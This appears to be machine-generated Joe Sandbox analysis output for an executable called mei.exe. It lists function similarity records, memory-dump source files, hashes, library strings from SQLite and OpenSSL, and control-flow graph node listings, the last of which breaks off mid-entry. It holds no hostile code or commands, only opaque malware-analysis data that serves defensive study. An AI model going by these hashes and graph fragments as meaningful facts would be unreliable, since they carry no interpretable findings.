• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: f1ca6ea12a98ff4eb48201161cb22c319a647daafa808267472dc2b63104d68a
• Instruction ID: 5a73ecc290f5d28c93cd01d54728652507f669f6ce43e09bf67e246eaf9aaa7d
• Opcode Fuzzy Hash: f1ca6ea12a98ff4eb48201161cb22c319a647daafa808267472dc2b63104d68a
• Instruction Fuzzy Hash: 6411D671F1C18282FB549B6AF5442BD1292EF8DBC0F888031EE5987B9ECE3CD4D5A600
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 69fb90209f1032b4e69d8b0751149bc2eb1170519beff1835249cde7d1444824
• Instruction ID: 6c29415a7b148c05102a130394b75ee49ecb973192186b1aac0c8fd0bb2f3788
• Opcode Fuzzy Hash: 69fb90209f1032b4e69d8b0751149bc2eb1170519beff1835249cde7d1444824
• Instruction Fuzzy Hash: 38411562E1878252FB649B25E80137A6BE0EF81BA4F144235EF6C87BD6DF3CD4419700
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313E9486
  • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
  • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6313DBF95), ref: 00007FF6313E94A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\mei.exe
• API String ID: 3976345311-163936489
• Opcode ID: 9fa3685a1bd0b725fed1ce90871433d4c2739ea64b9843da9ecd8f260f310b5b
• Instruction ID: ff2ef332488afe0cd5c034b34663221b332df6513d13aefe5f1f3791a3cb1353
• Opcode Fuzzy Hash: 9fa3685a1bd0b725fed1ce90871433d4c2739ea64b9843da9ecd8f260f310b5b
• Instruction Fuzzy Hash: F8417C33E08B02CAFB54DF26D4500BD37A4EF84784B556035E98E87B86DE3DE9919710
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: cd97ba882cf61520808db9468f7ebffeb4fea8ab3a293baa5276c2e7e13191e0
• Instruction ID: 794745bb3784181abf82f4a349291ba4825537a679526fbdbee34fd4c079b680
• Opcode Fuzzy Hash: cd97ba882cf61520808db9468f7ebffeb4fea8ab3a293baa5276c2e7e13191e0
• Instruction Fuzzy Hash: E041BF63B18B8182EB608F25E8443BA67A1FB98794F804035EE4DC7798DF3CD541DB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: d06083b29aaf7a7bb8f1cb43b97a3262d6381e0dc3a658b95be9ed3abb95a8cd
• Instruction ID: 639cacccc025e47ece6430f3f338159efbd0f9ecf17ea816a010a57a12235f89
• Opcode Fuzzy Hash: d06083b29aaf7a7bb8f1cb43b97a3262d6381e0dc3a658b95be9ed3abb95a8cd
• Instruction Fuzzy Hash: 7421CC73E0879282FB249B11D44427E77A5FB88B84F858035DA8D83784DFBCEE459760
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Fatal error detected
• API String ID: 1878133881-4025702859
• Opcode ID: 38ddc9f8031b6d28749fff208fae5418e08c87bb0529f444b5e3f442e23a2439
• Instruction ID: 94fdbb4a1ec209d58c205430c74c87744440bf4cd4ba205ee7943ce2d55d70fb
• Opcode Fuzzy Hash: 38ddc9f8031b6d28749fff208fae5418e08c87bb0529f444b5e3f442e23a2439
• Instruction Fuzzy Hash: 332153B2A2868291FB20DB11E4516EA73A4FF84784F805136E68D87B69DF3CD215DB00
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error detected
• API String ID: 1878133881-3513342764
• Opcode ID: 17a36bc69ed8b46b5b0e6c335e0ee94e3cbae77caabcd9ab1d2acf0b64b24cb0
• Instruction ID: 03af2a4ffb57e25615023aca6ee6b2a576552a00f17035bf759cd1a3ffa6dce1
• Opcode Fuzzy Hash: 17a36bc69ed8b46b5b0e6c335e0ee94e3cbae77caabcd9ab1d2acf0b64b24cb0
• Instruction Fuzzy Hash: 9D2165B2A2CA8691FB20DB11F4516EA63A4FF847C4F805136E68D87B69DF3CD215DB00
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: 2743ad350869e21c422f749301da5554f395f0d0fe1937856bf46b82881aa8c6
                                                                                                                                                                      • Instruction ID: fc566ed4ad416242e8007dffff6c97d3b7a1f863061701ab7f6acb44e1a5e16c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2743ad350869e21c422f749301da5554f395f0d0fe1937856bf46b82881aa8c6
                                                                                                                                                                      • Instruction Fuzzy Hash: AB115B32A18B4582EB608B15E45026977E4FF88F84F584231DECC47B59DF3CC5519B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                      • Opcode ID: 5067e1b2263128f29cfa21414fa1e963a58bf13dbeb460b59c80c356ce3c83bf
                                                                                                                                                                      • Instruction ID: 9f0aa2f1703540cd7e1b7650561774b48d6a1938b512a7361f0fad9f12a11bfe
                                                                                                                                                                      • Opcode Fuzzy Hash: 5067e1b2263128f29cfa21414fa1e963a58bf13dbeb460b59c80c356ce3c83bf
                                                                                                                                                                      • Instruction Fuzzy Hash: D6018F62D1C206C6FB60AF6494612BF63E0EF44708F801036D59DC6795DF3CE504EB14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:1.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:2.9%
                                                                                                                                                                      Total number of Nodes:339
                                                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
• API String ID: 0-2781224710
• Opcode ID: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
• Instruction ID: 909955307cf6f37b448b1ce23f16aa9e1761966cfbd7353976f107479a47598f
• Opcode Fuzzy Hash: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
• Instruction Fuzzy Hash: 5492A931A18A8282FB62EB21D8507BAA7A0EF45B85F54403ADB4D477BEDF3CE5458311
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2039915021.00007FFDFB899000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB2C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb2c0000_mei.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: 2v]
• API String ID: 3300690313-3021020117
• Opcode ID: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
• Instruction ID: 26864de990cf09db15bd3f5af167db6c7cfdf131b7620edd5896f79222679765
• Opcode Fuzzy Hash: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
• Instruction Fuzzy Hash: 6462082272919386EB198F38D51467D7BD0F788B89F045532EAAEC37D8EA3CE945C700
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: TLS 1.1
• API String ID: 3300690313-2459780185
• Opcode ID: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
• Instruction ID: 8cc6cd70e0caa9c91c867747a4d418e9ab7131b488bb240d85a6f6f0e6c1d55b
• Opcode Fuzzy Hash: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
• Instruction Fuzzy Hash: EC62086262C5928AE7268E38E84027D7791F748785F045536EBDEC37E8FA7CEA45C700
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image for the function starting at 7ffdff1a8290 not reproduced; executed and not-executed block listing omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: -journal$immutable$nolock
• API String ID: 817585512-4201244970
• Opcode ID: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
• Instruction ID: 36a4c66b788f443fc83f942c39ccf858ac520805bbb7dbf17425a1e4da624a25
• Opcode Fuzzy Hash: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
• Instruction Fuzzy Hash: BD327B63B0968286EB658F259460B7937A1FF44BA4F084335CA7E8B7D8EF3CE4558304
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph image for the function starting at 7ffdff211850 not reproduced; executed and not-executed block listing omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: database schema is locked: %s$out of memory$statement too long
• API String ID: 817585512-1046679716
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2039068428.00007FFDFB287000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFDFAD90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad90000_mei.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007B5630
• String ID: :memory:
• API String ID: 2248877218-2920599690
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph omitted; in the original, basic blocks are marked Executed or Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519$CreateFile
• String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
• API String ID: 1717138855-3829269058
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph omitted; in the original, basic blocks are marked Executed or Not Executed)
7ffdff1a92be-7ffdff1a92c7 call 7ffdff1a6d90 1481->1492 1482->1484 1493 7ffdff1a92e6-7ffdff1a92ee call 7ffdff1a2e40 1482->1493 1486 7ffdff1a92f5-7ffdff1a92ff 1483->1486 1487 7ffdff1a932b-7ffdff1a9338 00007FFE1A4519C0 1483->1487 1484->1456 1495 7ffdff1a9303-7ffdff1a9306 1486->1495 1496 7ffdff1a9301 1486->1496 1487->1476 1488->1450 1488->1455 1489->1472 1489->1490 1490->1472 1490->1478 1491->1479 1497 7ffdff1a91af-7ffdff1a91b6 1491->1497 1504 7ffdff1a92cc-7ffdff1a92d0 1492->1504 1493->1456 1501 7ffdff1a9308-7ffdff1a930e call 7ffdff1a2320 1495->1501 1502 7ffdff1a9313-7ffdff1a9327 call 7ffdff1a5850 1495->1502 1496->1495 1497->1491 1503 7ffdff1a91b8 1497->1503 1501->1502 1502->1487 1511 7ffdff1a9329 1502->1511 1503->1471 1504->1476 1509 7ffdff1a92d2 1504->1509 1505->1456 1505->1471 1509->1484 1511->1487
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 0-3764764234
                                                                                                                                                                      • Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                      • Instruction ID: 83b64a248f6502b11b9f30a33c9a2118e7c6c6c085dd9ebc998d54e1f0daf850
                                                                                                                                                                      • Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                      • Instruction Fuzzy Hash: D9713E23F0864681FB659F15D464B7963A1EF94B94F944236CA7D8B6EDDF3CE8818300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1512 7ffdff19c960-7ffdff19c98b 1513 7ffdff19c9db-7ffdff19c9ff 1512->1513 1514 7ffdff19c98d-7ffdff19c9a2 1512->1514 1517 7ffdff19ca04-7ffdff19ca28 ReadFile 1513->1517 1515 7ffdff19c9c4-7ffdff19c9d8 call 7ffdff2bda84 1514->1515 1516 7ffdff19c9a4 call 7ffdff2bda84 1514->1516 1515->1513 1524 7ffdff19c9a9 1516->1524 1518 7ffdff19ca9a-7ffdff19ca9c 1517->1518 1519 7ffdff19ca2a-7ffdff19ca33 1517->1519 1522 7ffdff19caca-7ffdff19cad3 1518->1522 1523 7ffdff19ca9e-7ffdff19cac5 call 7ffdff198e10 1518->1523 1519->1518 1530 7ffdff19ca35-7ffdff19ca43 1519->1530 1522->1524 1528 7ffdff19cad9-7ffdff19caee 00007FFE1A4519C0 1522->1528 1523->1522 1529 7ffdff19c9ab-7ffdff19c9c3 1524->1529 1528->1529 1532 7ffdff19ca45-7ffdff19ca4b 1530->1532 1533 7ffdff19ca74-7ffdff19ca95 call 7ffdff19c790 1530->1533 1534 7ffdff19ca4d-7ffdff19ca51 1532->1534 1535 7ffdff19ca53-7ffdff19ca56 1532->1535 1533->1529 1534->1535 1537 7ffdff19ca60-7ffdff19ca72 1534->1537 1535->1537 1538 7ffdff19ca58-7ffdff19ca5e 1535->1538 1537->1517 1538->1533 1538->1537
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519FileRead
                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                      • API String ID: 857436965-1843600136
                                                                                                                                                                      • Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                      • Instruction ID: fa3a2c10a27eaa19f6912ce141e9dd6ee1de54b66d45f450cf54dba03f2b962f
                                                                                                                                                                      • Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                      • Instruction Fuzzy Hash: 8841E233F08A4386E720DF15E4649A97365FB44784F544236EABE876E8EF3CE5468780
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1729 7ffe003114bf-7ffe0036ed94 call 7ffe0031132a * 2 1736 7ffe0036f0ea-7ffe0036f104 1729->1736 1737 7ffe0036ed9a-7ffe0036edb1 call 7ffe0038ce5b SetLastError 1729->1737 1740 7ffe0036edb3-7ffe0036edba 1737->1740 1741 7ffe0036edc1-7ffe0036edc8 1737->1741 1740->1741 1742 7ffe0036edca-7ffe0036edce 1741->1742 1743 7ffe0036edd6-7ffe0036ede0 1741->1743 1744 7ffe0036edf2-7ffe0036edf7 1742->1744 1745 7ffe0036edd0-7ffe0036edd4 1742->1745 1743->1744 1746 7ffe0036ede2-7ffe0036edec call 7ffe0031192e 1743->1746 1748 7ffe0036ee03 1744->1748 1749 7ffe0036edf9-7ffe0036edfc 1744->1749 1745->1743 1745->1744 1746->1736 1746->1744 1750 7ffe0036ee07-7ffe0036ee0e 1748->1750 1749->1750 1752 7ffe0036edfe 1749->1752 1753 7ffe0036ee10-7ffe0036ee17 1750->1753 1754 7ffe0036ee51-7ffe0036ee66 1750->1754 1755 7ffe0036eff3 1752->1755 1757 7ffe0036ee43-7ffe0036ee4b 1753->1757 1758 7ffe0036ee19-7ffe0036ee20 1753->1758 1759 7ffe0036eeb5-7ffe0036eebf 1754->1759 1760 7ffe0036ee68-7ffe0036ee72 1754->1760 1756 7ffe0036eff7-7ffe0036effa 1755->1756 1761 7ffe0036effc-7ffe0036efff call 7ffe0036e8a0 1756->1761 1762 7ffe0036f019-7ffe0036f01c 1756->1762 1757->1754 1758->1757 1763 7ffe0036ee22-7ffe0036ee31 1758->1763 1764 7ffe0036eec1-7ffe0036eecb call 7ffe0038cd9b 1759->1764 1765 7ffe0036eecd-7ffe0036eee3 call 7ffe003120d6 1759->1765 1760->1765 1766 7ffe0036ee74-7ffe0036ee77 1760->1766 1776 7ffe0036f004-7ffe0036f007 1761->1776 1770 7ffe0036f055-7ffe0036f059 1762->1770 1771 7ffe0036f01e-7ffe0036f021 call 7ffe0036f2d0 1762->1771 